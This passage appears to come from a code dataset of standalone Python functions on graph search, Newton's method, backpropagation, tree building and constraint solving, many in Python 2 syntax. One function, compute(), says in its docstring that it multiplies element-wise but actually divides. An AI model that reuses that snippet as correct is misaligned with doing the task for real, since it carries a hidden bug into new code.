neigh.g_cost\n current_dist = current_node.g_cost\n new_dist = current_dist + 1\n if neighbour_dist < new_dist:\n continue\n neigh.g_cost = new_dist\n self.set_h_cost(neigh)\n mix_neigh = {neigh.pos: neigh.g_cost}\n self.mix.update(mix_neigh)\n mix_current = {current_node.pos: current_node.g_cost}\n self.mix.update(mix_current)\n\n smallest_f = self.get_smallest_f_cost_unvisited_node()\n smallest_f_node = smallest_f[0]\n smallest_h_node = self.get_smallest_h_cost_unvisited_node()\n\n if (\n self.end_pos not in self.unvisited_pos\n or algo_utils.get_smallest_g_cost_unvisited_node(\n self.grid, self.unvisited_pos\n ).g_cost\n == self.inf\n ):\n for key, value in self.mix.items():\n self.mix[key] = round((value * 1.0) / self.end_node.g_cost, 3)\n self.backtrack_path(self.end_node)\n else:\n if smallest_f[1] > 1:\n current_node = smallest_h_node\n else:\n current_node = smallest_f_node\n self.solve()", "def newton_iteration(f: Callable, df: Callable, eps: float, x0: float = None, a: float = None, b: float = None,\n weight: float = 0.9, display: bool = False, max_iterations: int = 100) -> float:\n x = np.inf\n if x0 is None:\n x0 = (a + b) / 2\n if a is not None and b is not None and a == b:\n return a\n x_next = x0\n iterations = 0\n while abs(x - x_next) > eps and iterations < max_iterations:\n iterations += 1\n x = x_next\n\n if display:\n import matplotlib.pyplot as plt\n xx0 = a or x-1\n xx1 = b or x+1\n xx = np.linspace(xx0, xx1, 100)\n yy = np.array(list(map(f, xx)))\n plt.plot(xx, yy)\n plt.axvline(x=x)\n plt.show()\n\n f_x = f(x)\n try:\n df_x = df(x)\n except ZeroDivisionError:\n df_x = (f_x - f(x-eps))/eps\n if df_x != 0:\n x_next = x - f_x 
/ df_x\n\n if a is not None and x_next < a:\n x_next = weight * a + (1 - weight) * x\n elif b is not None and x_next > b:\n x_next = weight * b + (1 - weight) * x\n\n if a is not None and x_next < a:\n x_next = a\n if b is not None and x_next > b:\n x_next = b\n\n return x_next", "def calc_new_cost(self, initial_node, to_node):\n\n cost = compute_distance(initial_node, to_node)\n return initial_node.cost + cost", "def perform(self, node, inputs, outputs):\n x, w, v, W, V = inputs\n N = x.shape[0]\n outer = np.outer\n\n def G(n):\n return sum(\n v[:, m] * V.T[n].dot(v[:, m]) / (w[n] - w[m])\n for m in range(N)\n if m != n\n )\n\n g = sum(outer(v[:, n], v[:, n] * W[n] + G(n)) for n in range(N))\n\n # Numpy's eigh(a, 'L') (eigh(a, 'U')) is a function of tril(a)\n # (triu(a)) only. This means that partial derivative of\n # eigh(a, 'L') (eigh(a, 'U')) with respect to a[i,j] is zero\n # for i < j (i > j). At the same time, non-zero components of\n # the gradient must account for the fact that variation of the\n # opposite triangle contributes to variation of two elements\n # of Hermitian (symmetric) matrix. The following line\n # implements the necessary logic.\n out = self.tri0(g) + self.tri1(g).T\n\n # Make sure we return the right dtype even if NumPy performed\n # upcasting in self.tri0.\n outputs[0][0] = np.asarray(out, dtype=node.outputs[0].dtype)", "def a_star_alg(self, p1: int, p2: int, max_level: int = 1000):\r\n \r\n # Create start and end node\r\n start_node = Node(None, p1, self.node_dict[p1])\r\n start_node.g = start_node.h = start_node.f = 0\r\n end_node = Node(None, p2, self.node_dict[p2])\r\n end_node.g = end_node.h = end_node.f = 0\r\n\r\n # Initialize both open and closed list\r\n open_list = []\r\n closed_list = []\r\n\r\n # Add the start node\r\n open_list.append(start_node)\r\n\r\n # Loop until you find the end\r\n level = 0\r\n while len(open_list) > 0 and level < max_level:\r\n level += 1\r\n\r\n # Get the current node (the node in open_list with the lowest cost)\r\n current_node = open_list[0]\r\n current_index = 0\r\n for index, item in enumerate(open_list):\r\n if item.f < current_node.f:\r\n current_node = item\r\n current_index = index\r\n\r\n # Pop current off open list, add to closed list\r\n open_list.pop(current_index)\r\n closed_list.append(current_node)\r\n\r\n # Found the goal\r\n if current_node == end_node:\r\n path = []\r\n distance = current_node.g\r\n current = current_node\r\n while current is not None:\r\n path.append(current.number)\r\n current = current.parent\r\n\r\n return path[::-1], distance # Return reversed path\r\n\r\n # Generate children\r\n children = []\r\n for new_number in self.road_tree[current_node.number]: # Adjacent nodes\r\n new_node = Node(current_node, new_number, self.node_dict[new_number])\r\n children.append(new_node)\r\n\r\n # Loop through children\r\n for child in children:\r\n append_to_open_list = False\r\n\r\n # Create the f, g, and h values\r\n child.g = current_node.g + self.road_dict[(current_node.number, child.number)]\r\n child.h = sqrt((child.x - end_node.x) ** 2 + (child.y - end_node.y) ** 2) / 200\r\n child.f = child.g + child.h\r\n\r\n # Child is already in the closed list\r\n closed_list, append_to_open_list = self.check_in_list(child, closed_list, append_to_open_list)\r\n\r\n # Child is already in the open list\r\n open_list, append_to_open_list = self.check_in_list(child, open_list, append_to_open_list)\r\n\r\n # Add the child to the open list\r\n if append_to_open_list:\r\n open_list.append(child)\r\n\r\n return [], 
1e10", "def _reconstruct_result(self, node, ss_result, backward=False):\n prev = ss_result['prev']\n ele_diff = ss_result['ele_diff']\n\n path = [node]\n ele_gain = 0.\n contributions = {} # Of each node, to the cumulative elevation gain\n dist = ss_result['dist']\n\n if backward:\n # 'node' is the start point and so does not contribute to ele_gain\n contributions[node] = 0.\n else:\n # The ele diff between 'node' (first on the path) and next node\n # on the path toward the source\n contributions[node] = max([0., ele_diff[node]])\n ele_gain += contributions[node]\n\n # Follow backpointers to reconstruct path and compute statistics\n successor = node\n curr_node = prev[node]\n while curr_node is not None:\n path.append(curr_node)\n if backward:\n # ele_diff's were computed moving forward toward 'node', so we\n # must be careful to get the right contribution here\n contribution = max([0., -ele_diff[successor]])\n else:\n contribution = max([0., ele_diff[curr_node]])\n contributions[curr_node] = contribution\n ele_gain += contributions[curr_node]\n curr_node = prev[curr_node]\n successor = curr_node\n\n # Since path was built by appending and backtracking, need to\n # reverse it if 'node' is supposed to be the terminus\n if not backward:\n path.reverse()\n\n # Not yet a SearchResult: more processing needed in merge step\n result = {\n 'path': path,\n 'path_len': dist[node],\n 'ele_gain': ele_gain,\n 'contributions': contributions,\n 'dist': dist\n }\n\n return result", "def steepest_descent_f(init_x0, init_x1, alpha, n=5):\n ret = [(init_x0, init_x1)]\n a = init_x0\n b = init_x1\n for i in range(n):\n a1 = a - alpha * gradF1(a, b)\n b1 = b - alpha * gradF2(a, b)\n ret.append((a1, b1))\n a = a1\n b = b1 \n \n return ret", "def run_trial(self, num_nodes): \n # compute the neighbors for the newly-created node\n new_node_neighbors = set()\n for dummy_idx in range(num_nodes):\n new_node_neighbors.add(random.choice(self._node_numbers))\n # update the list of node numbers so that each node number \n # appears in the correct ratio\n\n # add num_nodes (= new node number) to list\n self._node_numbers.append(self._num_nodes)\n\n # add new neighbours to the list\n self._node_numbers.extend(list(new_node_neighbors))\n\n # update the number of nodes\n self._num_nodes += 1\n\n return new_node_neighbors", "def compute(self, node, input_vals):\r\n \"\"\"TODO: Your code here\"\"\"\r\n \"\"\"Given values of two input nodes, return result of element-wise multiplication.\"\"\"\r\n assert len(input_vals) == 2\r\n return input_vals[0] / input_vals[1]", "def deltaCalc(self, expected):\n \n n = len(self.structure)\n self.delta = [None] * n\n self.delta[n - 1] = []\n \n for i in xrange(len(expected)):\n curr = self.a[n - 1][i]\n self.delta[n - 1].append(self.derivativeFunc(curr) * (expected[i] - curr))\n self.delta[n - 1] = np.array(self.delta[n - 1])\n \n # From n - 1 to 1 layer \n for i in xrange(n - 1, 0, -1):\n currDelta = self.delta[i]\n if i != (n - 1):\n currDelta = currDelta[0][:-1]\n \n self.delta[i - 1] = np.array(np.dot(currDelta, self.theta[i]))\n self.delta[i - 1][0] *= self.a[i - 1]\n \n return", "def build(self, dist_matrix, class_map, cluster_naming_function):\n # Update attributes\n self.orig_dist_matrix = dist_matrix \n self.class_map = class_map \n self.work_dist_matrix = dist_matrix\n\n # Get number of elements\n n = dist_matrix.shape[0]\n\n if PROGRESS:\n print 'Starting tree build now!'\n\n # Loop through n-3 elements & add nodes in tree\n for i in range(n - 3):\n\n if DEBUG:\n print 'Distance 
Matrix'\n pprint(self.work_dist_matrix)\n print\n\n # Calculate q_matrix matrix from distances\n q_matrix = _calculate_q_matrix(self.work_dist_matrix)\n \n if DEBUG:\n print 'Q matrix:'\n pprint(q_matrix)\n print\n\n # Find pair of elements (i,j) where q_matrix(i,j) has the lowest value\n (min_col, min_row) = _find_min_pair(q_matrix)\n\n # Add nodes i,j, and cluster node of i and j to this tree\n # And update working distance matrix accordingly\n new_cluster_name = cluster_naming_function(min_row, min_col, self.cluster_map)\n self.cluster_leaves(min_row, min_col, new_cluster_name) \n\n if DEBUG:\n print 'Tree:'\n pprint(nx.clustering(self.tree))\n pprint(self.cluster_dictionary)\n print '\\n\\n'\n \n # View graph after each step for debugging\n if VIEW_ALL:\n labels = {i[0]: i[0]+'/'+i[1]['c'] for i in njt.tree.nodes(data=True)}\n layout = nx.spring_layout(njt.tree)\n nx.draw_networkx(njt.tree, pos=layout, with_labels=True, labels=labels) #class labels\n plt.show()\n\n if PROGRESS:\n print str(i + 1) + \" down, \" + str(n-i-4) + \" to go...\"\n \n # Add remaining branch lengths and nodes from working distance matrix to this tree \n previous_cluster = new_cluster_name\n mid_edge_length = 0.5 * (self.work_dist_matrix.iat[0, 1]\n + self.work_dist_matrix.iat[0, 2]\n - self.work_dist_matrix.iat[1, 2])\n (node1, node2) = (self.work_dist_matrix.columns[0], self.work_dist_matrix.columns[1])\n new_cluster = cluster_naming_function(node1, node2, self.cluster_map)\n self.cluster_leaves(node1, node2, new_cluster)\n # Viz only scales based on a weight attribute, so we set that as the length\n self.tree.add_edge(previous_cluster, new_cluster, length=mid_edge_length, weight=mid_edge_length)\n\n if DEBUG:\n print 'Final tree:'\n pprint(nx.clustering(self.tree))\n pprint(self.cluster_dictionary)", "def _DFS_loop(nodes, edges, t_n=None):\n\n if t_n is not None:\n n_t = dict((b,a) for a,b in t_n.items()) # {time: node}\n get_node_by_time = lambda time: time if t_n is None else n_t[time]\n get_time_by_node = lambda node: node if t_n is None else t_n[node]\n gen_edges = lambda node: map(get_time_by_node,edges[get_node_by_time(node)])\n\n explored = set()\n leader = dict()\n _DFS_loop.t = 0 # finishing time\n times = dict() # {time: node}\n\n def DFS(i):\n explored.add(i)\n leader[i] = s\n for j in gen_edges(i):\n if j not in explored:\n DFS(j)\n _DFS_loop.t += 1\n times[i] = _DFS_loop.t\n\n for i in nodes:\n if i not in explored:\n s = i # leader node\n DFS(i)\n\n leaders = defaultdict(list)\n for n,l in leader.items():\n leaders[get_node_by_time(l)].append(get_node_by_time(n))\n\n return times, leaders", "def solve_csp(nodes, arcs, max_steps):\n\n nodes = list(nodes)\n print 'nodes:', nodes\n\n node_values_dict = dict(zip(nodes, '2'*len(set(nodes))))\n print 'initial random assignment', node_values_dict\n indexes = np.arange(len(nodes))\n\n graph = {}\n for arc in arcs:\n if not arc[0] in graph:\n graph[arc[0]] = []\n if not arc[1] in graph:\n graph[arc[1]] = []\n graph[arc[0]].append(arc[1])\n graph[arc[1]].append(arc[0])\n for i in indexes:\n if i in graph:\n continue\n else:\n graph[i] = []\n graph = dict(sorted(graph.items()))\n print 'graph:', graph\n\n domain = [i for i in np.arange(1, 10, 1)]\n print 'initial domain for each node:', domain\n\n superAdjacency ={}\n for i in np.arange(len(nodes)):\n superAdjacency[i] = []\n superAdjacency[i].append(nodes[i])\n superAdjacency[i].append(node_values_dict[nodes[i]])\n superAdjacency[i].append(graph[i])\n superAdjacency[i].append(domain)\n\n print 
'superAdjacency', superAdjacency\n\n def getNodeType(superAdjacency, index):\n return list(superAdjacency[index])[0]\n\n def getCurrentAssignment(superAdjacency, index):\n return list(superAdjacency[index])[1]\n\n def getCurrentAssignmentForList(superAdjacency, indexList):\n return [int(list(superAdjacency[index])[1]) for index in indexList]\n\n def getSolution(superAdjacency):\n return [int(list(superAdjacency[index])[1]) for index in superAdjacency]\n\n def getNeighbours(superAdjacency, index):\n return list(superAdjacency[index])[2]\n\n def getDomain(superAdjacency, index):\n return list(superAdjacency[index])[3]\n\n def updateSuperAdjacency(superAdjacency, nodeType, newValue):\n updateList =[]\n for i in superAdjacency:\n if str(getNodeType(superAdjacency, i)) == nodeType:\n updateList.append(i)\n for i in updateList:\n superAdjacency[i][1] = newValue\n\n def isSolution():\n return graphConstraints(superAdjacency)\n\n def graphConstraints(superAdjacency):\n graphEval = []\n\n for index in superAdjacency:\n neighbours = getNeighbours(superAdjacency, index)\n nodeType = getNodeType(superAdjacency, index)\n\n if nodeType == 'T':\n graphEval.append(int(str(eval(str(\n getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0]))\n elif nodeType == 'C':\n return 'NA'\n elif nodeType == 'S':\n graphEval.append(int(str(eval(str(\n getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0]))\n elif nodeType == 'H':\n graphEval.append(int(str(np.sum(\n getCurrentAssignmentForList(superAdjacency, neighbours)))[0]))\n if nodeType == 'P':\n graphEval.append(int(str(np.sum(\n getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0]))\n\n currentAssignment = [item[1] for item in superAdjacency.values()]\n difference = map(sub, currentAssignment, graphEval)\n\n if sum(difference) == 0:\n return True\n else:\n return difference\n\n def findConflictVariable(superAdjacency, lastUpdateNode):\n node_conflict_count = {}\n for node in node_values_dict:\n node_conflict_count[node] = 0\n for index in superAdjacency:\n neighbours = getNeighbours(superAdjacency, index)\n nodeType = getNodeType(superAdjacency, index)\n if nodeType == 'T':\n try:\n if getCurrentAssignment(superAdjacency, index) != \\\n int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n elif nodeType == 'S':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n elif nodeType == 'H':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n if nodeType == 'P':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n choices = [k for k, v in node_conflict_count.items() if v > 0]\n if len(choices) > 0:\n updateNode = random.choice(choices)\n\n if updateNode == lastUpdateNode:\n choices.pop(choices.index(updateNode))\n try:\n lastUpdateNode = random.choice(choices)\n return lastUpdateNode, lastUpdateNode\n 
except:\n return lastUpdateNode, lastUpdateNode\n else:\n lastUpdateNode = updateNode\n return updateNode, lastUpdateNode\n else:\n return 'NA', 'NA'\n\n\n\n def valueForConflictedVariable(superAdjacency, var):\n for index in superAdjacency:\n nodeType = getNodeType(superAdjacency, index)\n neighbours = getNeighbours(superAdjacency, index)\n if not neighbours:\n continue\n elif str(nodeType) == str(var):\n domain = getDomain(superAdjacency, index)\n\n choice = random.choice(domain)\n if nodeType == 'T':\n choice = int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0])\n elif nodeType == 'S':\n choice = int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0])\n elif nodeType == 'H':\n choice = int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[0])\n if nodeType == 'P':\n choice = int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0])\n\n choice = int(choice)\n if choice % 2 == 0:\n return choice\n else:\n return choice\n\n def min_conflicts(nodes, arcs, max_steps):\n lastUpdateNode = ''\n for i in range(max_steps):\n if isSolution() == True:\n return\n var, lastUpdateNode = findConflictVariable(superAdjacency, lastUpdateNode)\n if var != 'NA':\n value = valueForConflictedVariable(superAdjacency, var)\n updateSuperAdjacency(superAdjacency, var, value)\n node_values_dict[var] = value\n else:\n pass\n\n return\n\n min_conflicts(nodes, arcs, max_steps)\n node_values = getSolution(superAdjacency)\n return node_values", "def newton_raphson(f,x0,iterations): \n current = x0\n fdash = differentiate_polynomial(f)\n print(fdash)\n for i in range(iterations): \n current = current - evaluate_polynomial(f,current)/evaluate_polynomial(fdash,current)\n return current", "def update_nodes(self):\n raise NotImplementedError('ERROR: sweeper has to implement update_nodes(self)')", "def test_compare_old_to_new_method_to_create_trees(self):\n nodes = util.generate_sequence_of_points(2, 2)\n tree1 = kdtree.createNewTree(nodes)\n kdtree.visualize(tree1)\n \n sel_axis = (lambda axis: axis)\n tree2 = kdtree.createNewTree([[0.5, 0.5]],axis = 0, sel_axis= sel_axis)\n tree2.split2([0.25, 0.5], axis = 1)\n tree2.split2([0.75, 0.5], axis = 1)\n \n #left\n tree2.split2([0.25, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.25, 0.75], axis = 0, sel_axis = sel_axis)\n \n #right\n tree2.split2([0.75, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.75, 0.75], axis = 0, sel_axis = sel_axis)\n \n kdtree.visualize(tree2)\n \n for n in zip(kdtree.level_order(tree1), kdtree.level_order(tree2)):\n self.assertEqual(n[0].data, n[1].data, \"elements not equal\")\n \n if n[0].data is not None and n[1].data is not None:\n self.assertEqual(n[0].axis, n[1].axis, \"elements not equal\")", "def prepare_data_for_d(self):\n\n center_nodes = []\n neighbor_nodes = []\n labels = []\n for i in self.root_nodes:\n if np.random.rand() < config.update_ratio:\n # self.graph[i] = [neighbors of i]\n pos = self.graph[i]\n neg, _ = self.sample(i, self.trees[i], len(pos), for_d=True)\n # print(\"tree_i_d: \", self.trees[i])\n # print(\"neg_samples: \", neg)\n # print(\"neg is: \", neg)\n if len(pos) != 0 and neg is not None:\n # positive samples\n center_nodes.extend([i] * len(pos))\n neighbor_nodes.extend(pos)\n labels.extend([1] * len(pos))\n\n # negative samples\n center_nodes.extend([i] * len(pos))\n neighbor_nodes.extend(neg)\n labels.extend([0] * len(neg))\n # print(\"cen: \", 
center_nodes)\n return center_nodes, neighbor_nodes, labels", "def iterative_solution(list1, list2):\n pre_root = Node(-1)\n prev = pre_root\n\n while list1 and list2:\n if list1.data <= list2.data:\n prev.next = list1\n list1 = list1.next\n else:\n prev.next = list2\n list2 = list2.next\n prev = prev.next\n\n if not list1:\n prev.next = list2\n else:\n prev.next = list1\n\n return pre_root.next", "def startTreeBasedCoord(self):\n self.log_message('ID {0} starts Load Propagation Optimization'.format(self.CommID))\n #self.MsgReceiveCount_interval = 0\n #self.MsgSendCount_interval = 0\n\n self.noOfTimesteps = (self.toTime - self.fromTime) / self.stepSize + 1\n\n # calculate pool of schedules (also saved in self.schedules) and schedule load curves\n if self.getTER1() != 0: # if not a gas boiler\n self.calcSchedulePool(self.fromTime, self.toTime)\n self.calcScheduleConsumptionCurves()\n\n if not self.Parent: #root node\n random.seed() # initialize pseudo random number generator\n\n\n\n # leave nodes select initial best schedule from schedule pool based on fluctuations curve and propagate their load to parent\n if not self.Children:\n #self.ChildrenProcessed = [0 for x in range(len(self.Children))]\n if self.getTER1() != 0: # not a gas boiler\n self.selectBestSchedule(copy.deepcopy(self.ERemainderLocal))\n self.setSOC(self.SOCEnd[self.chosenScheduleIndex])\n self.setStateModlvl(self.chosenSchedule[-1])\n self.sendMessage(self.Parent, 40, ['newload', copy.deepcopy(self.EConsumptionChosenSchedule)])\n else:\n zeros = [0 for x in range(len(self.ERemainderLocal))]\n self.sendMessage(self.Parent, 40, ['newload', copy.deepcopy(zeros)])\n\n else: # if not a leave node\n self.EConsumptionChildCurves = [ [0 for x in range(len(self.EFluctuationCurve))] for y in range(len(self.Children))] # initialize array for load curves of children\n self.EConsumptionChildCurvesRec = [ [0 for x in range(len(self.EFluctuationCurve))] for y in range(len(self.Children))] # initialize array for load curves of children\n self.noOfConsumptionCurvesReceived = 0\n #self.ChildLoadCurvesChosen = [0 for x in range(len(self.Children))]\n return", "def gradients(output_node, node_list):\n # a map from node to a list of gradient contributions from each output node\n node_to_output_grads_list = {}\n # Special note on initializing gradient of output_node as oneslike_op(output_node):\n # We are really taking a derivative of the scalar reduce_sum(output_node)\n # instead of the vector output_node. 
But this is the common case for loss function.\n node_to_output_grads_list[output_node] = [oneslike_op(output_node)]\n # a map from node to the gradient of that node\n node_to_output_grad = {}\n # Traverse graph in reverse topological order given the output_node that we are taking gradient wrt.\n reverse_topo_order = list(reversed(find_topo_sort([output_node])))\n for node in reverse_topo_order:\n grad = sum_node_list(node_to_output_grads_list[node]) # Node\n node_to_output_grad[node] = grad # node_to_output_grad[node]为对相应的node求导, 即文章中的v^-_n\n grads = node.op.gradient(node, grad) # Node list\n for i in range(len(node.inputs)):\n ch = node.inputs[i]\n grads_list = node_to_output_grads_list.get(ch, [])\n grads_list.append(grads[i])\n node_to_output_grads_list[ch] = grads_list\n\n # Collect results for gradients requested.\n grad_node_list = [node_to_output_grad[node] for node in node_list]\n return grad_node_list", "def iter_func(root_name, root, set_traverse, list_funcs, G, strings,\n plot_nodes, cur_pos, xgrain, min_weight, max_weight):\n set_traverse.append(root)\n nbs = G.neighbors(root)\n nbs = G[root]\n\n plot_nodes.append(cur_pos)\n xgrain = xgrain/2.0\n\n flag_pn = -1\n for nb in nbs.keys():\n if nb in set_traverse:\n continue\n\n next_pos = [0, 0, 0]\n if root.name == root_name:\n next_pos[0] = cur_pos[0]\n else:\n next_pos[0] = cur_pos[0] + xgrain*flag_pn*( 0.8+0.2*(nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight) ) #* (nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight)\n next_pos[1] = cur_pos[1] + 3.0*(nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight)\n next_pos[2] = nb.name\n\n flag_pn = flag_pn*(-1)\n\n strings.append([root, nb])\n set_traverse, strings, plot_nodes = iter_func(root_name, nb, set_traverse, list_funcs, G, strings, plot_nodes, next_pos, xgrain, min_weight, max_weight)\n\n return set_traverse, strings, plot_nodes", "def run_trial(self, num_nodes): \n #compute the neighbors for the newly-created node\n new_node_neighbors = set()\n for dummy_idx in range(num_nodes):\n new_node_neighbors.add(random.choice(self._node_numbers))\n # update the list of node numbers so that each node number \n # appears in the correct ratio\n self._node_numbers.append(self._num_nodes)\n self._node_numbers.extend(list(new_node_neighbors)) \n #update the number of nodes\n self._num_nodes += 1\n return list(new_node_neighbors)", "def computeNodeVolumes(self):\n for i in np.arange(0,self.ni):\n for j in np.arange(0,self.nj):\n for k in np.arange(0,self.nk):\n \n V = self.dh[0]*self.dh[1]*self.dh[2]\n if (i==0 or i==self.ni-1): V*=0.5\n if (j==0 or j==self.nj-1): V*=0.5\n if (k==0 or k==self.nk-1): V*=0.5\n \n self.node_vol[i][j][k] = V", "def newton_body(iterand):\n next_backward_difference = iterand.next_backward_difference\n next_state_vec = iterand.next_state_vec\n\n rhs = newton_coefficient * step_size_cast * ode_fn_vec(\n next_time,\n next_state_vec) - rhs_constant_term - next_backward_difference\n delta = tf.squeeze(\n tf.linalg.triangular_solve(\n upper,\n tf.matmul(tf.transpose(unitary), rhs[:, tf.newaxis]),\n lower=False))\n num_iters = iterand.num_iters + 1\n\n next_backward_difference += delta\n next_state_vec += delta\n\n delta_norm = tf.cast(tf.norm(delta), real_dtype)\n lipschitz_const = delta_norm / iterand.prev_delta_norm\n\n # Stop if method has converged.\n approx_dist_to_sol = lipschitz_const / (1. 
- lipschitz_const) * delta_norm\n close_to_sol = approx_dist_to_sol < tol\n delta_norm_is_zero = tf.equal(delta_norm, tf.constant(0., dtype=real_dtype))\n converged = close_to_sol | delta_norm_is_zero\n finished = converged\n\n # Stop if any of the following conditions are met:\n # (A) We have hit the maximum number of iterations.\n # (B) The method is converging too slowly.\n # (C) The method is not expected to converge.\n too_slow = lipschitz_const > 1.\n finished = finished | too_slow\n if max_num_iters is not None:\n too_many_iters = tf.equal(num_iters, max_num_iters)\n num_iters_left = max_num_iters - num_iters\n num_iters_left_cast = tf.cast(num_iters_left, real_dtype)\n wont_converge = (\n approx_dist_to_sol * lipschitz_const**num_iters_left_cast > tol)\n finished = finished | too_many_iters | wont_converge\n\n return [\n _NewtonIterand(\n converged=converged,\n finished=finished,\n next_backward_difference=next_backward_difference,\n next_state_vec=next_state_vec,\n num_iters=num_iters,\n prev_delta_norm=delta_norm)\n ]", "def Trees__LCA_LowestCommonDenominator():\n # Python2 ported to Python3 via 2to3-3.7\n # URL:# URL:https://www.hackerrank.com/challenges/binary-search-tree-lowest-common-ancestor/problem\n '''\n class Node:\n def __init__(self,info): \n self.info = info \n self.left = None \n self.right = None \n // this is a node of the tree , which contains info as data, left , right\n '''\n def lca(root, v1, v2):\n # Find a and b. Link child nodes to parent to be able to backtrack.\n # (1) Note, we add 'parent' attribute to node dynamically via node.parent = ...\n root.parent = None\n node_stack = []\n node_stack.append(root)\n v1_node, v2_node = None, None\n while node_stack:\n node = node_stack.pop()\n if not v1_node and node.info == v1:\n v1_node = node\n if not v2_node and node.info == v2:\n v2_node = node\n for child_node in [node.left, node.right]:\n if child_node:\n child_node.parent = node # (1)\n node_stack.append(child_node)\n\n # Generate path from A to root.\n curr = v1_node\n a_to_root = set()\n while curr:\n a_to_root.add(curr.info)\n curr = curr.parent\n\n # traverse up b until you come across an element in a's path to parent.\n curr = v2_node\n while curr:\n if curr.info in a_to_root:\n return curr\n else:\n curr = curr.parent\n\n print(\"Shouldn't be here, Something went wrong\")\n\n # # Recursive. (Iterative is better, but did recursive for practice.) 
~15 min.\n # # Main idea is that we count the number of v1/v2's found of the subnodes.\n # # If a node has sum of 2, we know it's the lca.\n # def lca(root, v1, v2):\n # def lca_helper(node):\n # ret_node = None\n # if not node:\n # return 0, None\n # v_match_counter = 0\n # if node.info in [v1, v2]:\n # v_match_counter += 1\n # left_count, left_node_ret = lca_helper(node.left)\n # right_count, right_node_ret = lca_helper(node.right)\n # v_match_counter += left_count + right_count\n # if v_match_counter == 2:\n # ret_node = node\n # if left_node_ret:\n # ret_node = left_node_ret\n # if right_node_ret:\n # ret_node = right_node_ret\n # return v_match_counter, ret_node\n\n # _, node = lca_helper(root)\n # return node", "def extractTree(nodesList, rootNode):\n if len(nodesList) == 0:\n return\n if nodesList[0] == '!':\n return nodesList[1:]\n\n splitAttribute, splitValue, attributeValue = nodesList[0].strip().split('-')\n nodesList = nodesList[1:]\n \n if splitAttribute != splitValue or splitAttribute != '$' or splitValue != '$':\n rootNode.setSplit((splitAttribute, splitValue))\n else:\n rootNode.setSplit(\"Base case\")\n rootNode.setData(attributeValue)\n return nodesList[2:]\n \n \n leftTree = Tree()\n rightTree = Tree()\n rootNode.setLesser(leftTree)\n rootNode.setGreater(rightTree)\n nodesList = extractTree(nodesList, leftTree)\n\n \n \n nodesList = extractTree(nodesList, rightTree)\n\n return nodesList", "def number_nodes(tree):\n def list_of_nodes(tree):\n \"\"\"Return a list of internal nodes in postorder traversal\n\n @param HuffmanNode tree: a tree to traverse\n @rtype: list\n\n >>> t = HuffmanNode(None, HuffmanNode(6), HuffmanNode(7))\n >>> list_of_nodes(t) == [t]\n True\n >>> t = HuffmanNode(None, HuffmanNode(8), HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)))\n >>> list_of_nodes(t) == [HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)), HuffmanNode(None, HuffmanNode(8), HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)))]\n True\n \"\"\"\n list_ = []\n if tree.left.is_leaf() and tree.right.is_leaf():\n list_.append(tree)\n return list_\n elif tree.left.is_leaf():\n list_.extend(list_of_nodes(tree.right))\n list_.append(tree)\n return list_\n elif tree.right.is_leaf():\n list_.extend(list_of_nodes(tree.left))\n list_.append(tree)\n return list_\n else:\n list_.extend(list_of_nodes(tree.left))\n list_.extend(list_of_nodes(tree.right))\n list_.append(tree)\n return list_\n\n internal_nodes = list_of_nodes(tree)\n for i in range(len(internal_nodes)):\n node = internal_nodes[i]\n node.number = i", "def newCostCalc(dfNew, curCost,a,b):\n a1,a2,a3 = dfNew.iloc[a-2],dfNew.iloc[a-1],dfNew.iloc[a]\n b1,b2,b3 = dfNew.iloc[b-2],dfNew.iloc[b-1],dfNew.iloc[b]\n reCalc = curCost\n reCalc = reCalc - euclideanDistance(a1['x'],a1['y'],a2['x'],a2['y'])\n reCalc = reCalc - euclideanDistance(a2['x'],a2['y'],a3['x'],a3['y'])\n reCalc = reCalc - euclideanDistance(b1['x'],b1['y'],b2['x'],b2['y'])\n reCalc = reCalc - euclideanDistance(b2['x'],b2['y'],b3['x'],b3['y'])\n\n x, y = dfNew.iloc[a-1].copy(), dfNew.iloc[b-1].copy()\n dfNew.iloc[a-1],dfNew.iloc[b-1] = y,x\n\n a1,a2,a3 = dfNew.iloc[a-2],dfNew.iloc[a-1],dfNew.iloc[a]\n b1,b2,b3 = dfNew.iloc[b-2],dfNew.iloc[b-1],dfNew.iloc[b]\n\n reCalc = reCalc + euclideanDistance(a1['x'],a1['y'],a2['x'],a2['y'])\n reCalc = reCalc + euclideanDistance(a2['x'],a2['y'],a3['x'],a3['y'])\n reCalc = reCalc + euclideanDistance(b1['x'],b1['y'],b2['x'],b2['y'])\n reCalc = reCalc + euclideanDistance(b2['x'],b2['y'],b3['x'],b3['y'])\n\n x, y = dfNew.iloc[a-1].copy(), 
